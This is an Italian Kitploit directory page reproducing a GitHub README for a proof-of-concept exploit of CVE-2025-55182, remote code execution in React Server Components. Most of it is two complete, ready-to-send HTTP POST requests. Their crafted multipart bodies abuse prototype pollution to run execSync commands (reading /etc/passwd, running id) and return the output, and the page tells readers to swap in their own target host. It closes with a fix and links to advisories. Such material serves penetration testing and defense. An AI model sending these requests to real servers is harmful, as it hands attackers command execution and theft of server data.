Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
React2Shell_cve-2025-55182 — Exploit proof-of-concept per CVE-2025-55182, che dimostra l'esecuzione remota di codice nei React Server Components tramite deserializzazione non sicura delle richieste. Include richieste HTTP appositamente create per penetration testing. | Kitploit
Strumenti/GitHubGitHub/ethicalrohitt/react2shell_cve-2025-55182
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubethicalrohitt/react2shell_cve-2025-55182

React2Shell_cve-2025-55182

Exploit proof-of-concept per CVE-2025-55182, che dimostra l'esecuzione remota di codice nei React Server Components tramite deserializzazione non sicura delle richieste. Include richieste HTTP appositamente create per penetration testing.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
8 mesi faNon ancora revisionato

React Server Components RCE - CVE-2025-55182

Ciao! Spero tu stia passando una bella giornata! 😊✨

Di cosa si tratta?

React Server Components versioni 19.0.0, 19.1.0, 19.1.1 e 19.2.0 hanno un grave problema di sicurezza. I pacchetti react-server-dom-parcel, react-server-dom-turbopack e react-server-dom-webpack sono interessati.

Il problema si verifica quando il server legge i dati dalle richieste in modo non sicuro. Gli attaccanti possono inviare dati speciali che fanno eseguire al server i loro comandi.


Prova di concetto - Esempio di attacco completo

Ecco la richiesta di attacco completa che mostra il problema. Ho cambiato i comandi con esempi sicuri.

Sostituisci target-website.com con il sito web che stai testando.

Richiesta di attacco #1 - Leggi file di sistema

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 721

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd|tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Richiesta di attacco #2 - Controlla informazioni utente

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 691

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Spiegazione semplice

  1. Il server legge i dati dalla richiesta
  2. I dati dannosi possono ingannare il server facendogli eseguire comandi
  3. Gli attaccanti possono eseguire qualsiasi comando vogliono
  4. I comandi sono nascosti nei dati che inviamo

Cosa può succedere?

Gli attaccanti possono:

  • Eseguire qualsiasi comando sul server
  • Leggere file segreti
  • Prendere il controllo del server
  • Rubare tutti i dati

Come risolvere

Aggiorna React immediatamente! Ottieni l'ultima versione in cui questo problema è risolto.


Link utili

  • Scanner ufficiale
  • Dettagli tecnici
  • Avviso di sicurezza di Facebook
  • Lista di sicurezza OpenWall
  • Blog ufficiale di React
  • Avviso di sicurezza di Next.js
  • Avviso di aggiornamento di Vercel

Prenditi cura di te e stai al sicuro! ✨❤️

Scarica lo strumento